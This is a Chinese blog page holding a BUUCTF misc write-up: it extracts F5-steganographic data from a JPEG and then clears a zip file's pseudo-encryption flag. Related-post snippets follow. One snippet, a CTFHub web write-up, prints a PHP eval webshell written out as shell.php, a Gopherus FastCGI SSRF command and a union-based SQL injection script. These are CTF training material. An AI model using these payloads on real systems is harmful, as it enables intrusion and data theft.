BUUCTF 刷新过的图片 writeup

原创 已于 2022-03-19 22:08:38 修改 · 1.6k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python

于 2021-10-15 13:17:15 首次发布
博客内容涉及F5加密技术的使用,通过在Kali系统中执行特定指令解密图片中的隐藏信息,得到的output.txt文件含有乱码且实际为压缩包。利用010编辑器识别文件头确定其为压缩格式,解压可能需要密码,解密过程揭示了文件的伪加密特性。最终成功解压得到flag。

下载后是一张图片,但是这张图片实在有点。。。
这里题目是刷新过的图片,刷新是F5键呀,这就是一个提示,图片是F5加密,这里如果不知道这种加密就比较难办。
kali:在F5-steganography路径下,执行下面指令。解密后就多了一个output.txt文件。看一下,发现是乱码。用010看一下,发现是压缩包(文件头是50400102)。改一下后缀,解压,这里我忘记解压时有没有输入密码的弹窗,如果有的话应该是伪加密(找到504b后面的14 00后面的两组十六进制数,这就是加密的标记位)。解压后就是flag。
在这里插入图片描述

buuctf--刷新过的图片
ncnfjdjjd的博客
02-09 2453
F5-steganography
BUUCTF Misc 刷新过的图片
Leslie_LIL的博客
03-06 4654
题目如下: 作为新手的我也是第一次做到F5隐写题目,卡了好久!!! 一开始我是在Windows下载F5-steganography,不知道怎么用也不知道能不能在Windows下使用,辛酸唉 F5-steganography 在kali下的下载方式: git clone https://github.com/matthewgao/F5-steganography 但是我不知道为啥啊就是卡在这了,所以我直接网站下载了 在F5文件夹下打开终端,可以把图片放在文件夹的下面使用命令,也可以使用图片的绝对路径
BUUCTF-MISC-刷新过的图片
xiaozhangqian的博客
10-18 3542
emmmm,最近拖拖拉拉做完了这道题,反思一下最近摸鱼太多了 下载下来后,题目提到的刷新过的图片,这个之前没接触过,就去网上找了一些wp,涉及到的F5刷新隐写,然后就先下载一下。F5-steganography git clone https://github.com/matthewgao/F5-steganography 你会在自己的root里面发现新增的F5-steganography文件夹(最后输出的output.txt就在里面) 先转到 F5-steganography cd /roo
信息安全专业实训-Day4
Anzuokonglin的博客
04-18 703
今天主要进行CTF之MISC解题过程。
BUUCTF——刷新过的图片
小元砸的博客
03-22 2319
hint:浏览图片的时候刷新键有没有用呢 注意 涉及工具: F5-steganography-master下载链接(kaili中进行) 使用方法: java Extract /图片的绝对路径 [-p 密码] [-e 输出文件] 解题过程: 打开后是如下图片,尝试了很多方法,发现了是F5隐写 之后得到output.txt,修改成zip形式,发现有密码,是伪加密,破解后即得flag ...
[BUUCTF misc]刷新过的图片
qq_50665826的博客
07-29 6420
如题: 下载并解压缩得到一张图片(很帅气) 题目说“刷新过的图片”,结合键盘上刷新键为F5可判断此题为F5隐写,运用工具F5-steganography可以对其中的内容进行提取(工具下载) 输入命令 java Extract 文件的绝对路径 可以得到一个output.txt文件,用WinHex打开发现其为一个压缩包,并且还存在伪加密,将文件后缀改为.zip并将加密位01改为00,即可得到flag ...
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 549
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
BugkuCTF——最新web篇writeup(持续更新)
1匹黑马
11-16 4471
文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag:KEY{Web-2-bugKssNNikls9100} 计算器 这里做了输入长度限制,F12选中输入框,修改长度限制即可。 flag:flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET,只要我们传递的参数为what,并且内容为flag,即可输出flag。 flag:flag{bugku_get_su8
BUUCTF [BSidesCF 2019] Mixer
Senimo
01-08 664
BUUCTF [BSidesCF 2019] Mixer 考点: 启动环境: 页面提示需要提升权限,并且提到了cookie,输入框中还有不能输入的is_admin属性 修改前端,使其值等于1: <input type="text" class="name" disabled="1" value="1"> 随意输入First name与Last name查看回显: 提示了需要以admin身份登陆,并将is_admin设置为1,使用BurpSuite抓取数据包: 使用Repeater发送后,
BUUCTF [网鼎杯 2020 朱雀组] phpweb
Senimo
12-09 937
BUUCTF [网鼎杯 2020 朱雀组] phpweb 考点: 启动环境: 页面有Warning,发现页面存在自动刷新情况,使用BurpSuite抓取数据包:
BUUCTF [HCTF 2018] Hide and seek
Senimo
01-12 1247
BUUCTF [HCTF 2018] Hide and seek 考点: 软连接读取任意文件 Flask伪造session /proc/self/environ文件获取当前进程的环境变量列表 random.seed()生成的伪随机数种子 MAC地址存放在/sys/class/net/eth0/address文件 启动环境: 信息中心,登陆后查看更多信息,导航栏上内容并不会跳转 尝试登陆: 以为是弱密码,但发现任意用户密码均可登陆,登陆后存在上传点 首先上传正常的txt文件: 得到回显: 需要上传
[buuctf]刷新过的图片
seventy_h的博客
05-17 1352
buuctf刷新过的图片
BUUCTF杂项题】刷新过的图片
Power的博客
02-09 1097
F5对jpg文件的隐写解密
BUUCTF 刷新过的图片 1
YueXuan_521的博客
11-24 1811
BUUCTF 刷新过的图片 1 (也可以使用绝对路径),使用命令导出Misc.jpg图片的隐写内容到output.txt文件(在F5-steganography目录下)。1、根据题目提示,结合键盘上的刷新键为F5,猜测本题使用了F5隐写,使用F5-steganography工具导出隐写内容。查看output.txt文件,发现pk文件头,确认为zip压缩包,并且内部还有flag.txt文件。3、更改output.txt文件的后缀为.zip,尝试解压压缩包,需要密码。
buuctf-misc-刷新过的图片
weixin_46079186的博客
07-18 907
下载题目拿到一张很恶心的图片 使用winhex 啥的没什么发现,题目说到刷新,想到了F5隐写(看了其他文章) 这边使用工具 F5-steganography 下载地址 https://github.com/matthewgao/F5-steganography 命令 java Extract.java Misc.jpg 在 目录下会生成一个output.txt 丢到winhex 发现是zip 文件,还是个伪加密,把01 修改 为 00 格式改回 zip,解压拿到flag fla..
BUUCTF刷新图片
m0_73752956的博客
12-09 465
java -jar ZipCenOp.jar r D:\BUUCTF\11\11\flag.zip(文件位置)java Extract D:\BUUCTF\misc\刷新过的图片\Misc.jpg。4.发现有PK字符怀疑是压缩包文件,将output.txt改为outpt.zip。6.使用工具 ZipCenOp.jar破解伪加密,也可以自己修改。2.打开之后是一张图片,使用工具F5隐写工具。5.打开发现需要密码,怀疑是否是压缩包伪加密。1.需要用到的工具F5隐写,压缩包伪加密。在打开改压缩包就不需要密码。
BUUCTF misc 专题(34)刷新过的图片
tt_npc的博客
11-28 1086
下载之后是一个压缩包,解压出来一张图片 也是试了好多的工具,一点头绪都没有,看了一波大佬的博客,才知道这是F5隐写 这里就需要用到F5-stegsolve这个工具了 我们可以在kali中进行安装使用 在root权限下输入命令git cloneGitHub - matthewgao/F5-steganography: F5 steganography 然后再在F5-stegsolve文件夹中打开终端,用root权限输入命令java Extract 文件名 查看被隐藏的内容 再打开...
buuctf 刷新过的图片
个人做题记录,大佬勿喷
12-27 607
链接:https://pan.baidu.com/s/1rLk1IngYibCyVc2YPSYxQw。题目提示是刷新刷新的话跟f5有关,刚好有个F5 的工具,直接开始尝试。然后我这里直接用7z解压了,7z可以无视伪加密,我只能说真香啊。PK开头应该是个压缩包,我们再用010editor打开看看。这个是f5的文件夹,下载后将图片放在文件夹里面。504b0304开头,压缩包无疑了。伪加密的内容看这个大佬的,讲得很好。下载附件,解压打开是一个图片。打开cmd,进入该文件夹。解压就得到flag咯。
writeup
最新发布
09-26
以下是部分 CTFHub web 基础教程的 writeup: - **信息泄漏**: ```bash # 安装 dirsearch 包 sudo apt-get install dirsearch # 目录扫描,-u 用于指定要扫描的 URL sudo dirsearch -u "http://challenge-74ace4f302db1181.sandbox.ctfhub.com:10800/" # 进入相关目录 ls cd site ls cd challenge-74ace4f302db1181.sandbox.ctfhub.com:10800/ ls # 扫描程序获取当前 Git 仓库的提交历史信息 git log # 在 Git 中配置一个名为 safe.directory 的全局设置,指定安全目录 git config --global --add safe.directory /home/kali/Desktop/GitHack/site/challenge-74ace4f302db1181.sandbox.ctfhub.com:10800 ls git log ``` - **SSRF 通关攻略之 FastCGI 协议**: ```bash # 在 kali 里下载 gopherus 工具并解压 git clone https://github.com/tarunkant/Gopherus.git # 在文件里打开终端,执行命令 python2 gopherus.py --exploit fastcgi ``` 判断文件是否存在,通过访问不同文件观察返回信息: ```bash # 尝试访问首页文件 访问首页文件 index.php # 访问不存在的文件 输入 wjf.php 显示 404,说明 index.php 存在 ``` 注入木马及编码操作: ```bash # 一句话木马 <?php @eval($_POST['cmd']);?> # base64 编码 PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= # 解码并保存为 shell.php echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=" | base64 -d > shell.php ``` 连接木马: ```bash # 打开蚁剑,右键添加数据,添加木马文件 http://challenge-641b288f17028a60.sandbox.ctfhub.com:10800/wjf123.php ``` - **SQL 注入**: ```python import requests def mySQL(payload): url = 'http://challenge-196392c6b0acebd8.sandbox.ctfhub.com:10800/' header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36", "Cookie": "id=-1 " + payload + "; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F", } r = requests.get(url, headers=header) return r.text print(mySQL("union select 1,group_concat(schema_name)from information_schema.schemata")) print(mySQL("union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'")) print(mySQL("union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='srdnlrlphq'")) print(mySQL("union select 1,group_concat(icehhmfjxt) from sqli.srdnlrlphq")) ``` - **XSS**:分析完后利用前面的 XSS 网站生成 XSS 攻击代码。注册完进入页面,点击“我的项目”后面的“创建”,选择默认配置,拉到最下面点击“下一步”,将生成的代码拼接到原题目网址后面的 `?name=` 后面,再输入到第二个框内,点击“send”。成功后回到 XSS 网站点击项目内容查看记录[^3]。
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

碧羽o(* ̄▽ ̄*)ブ回雪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值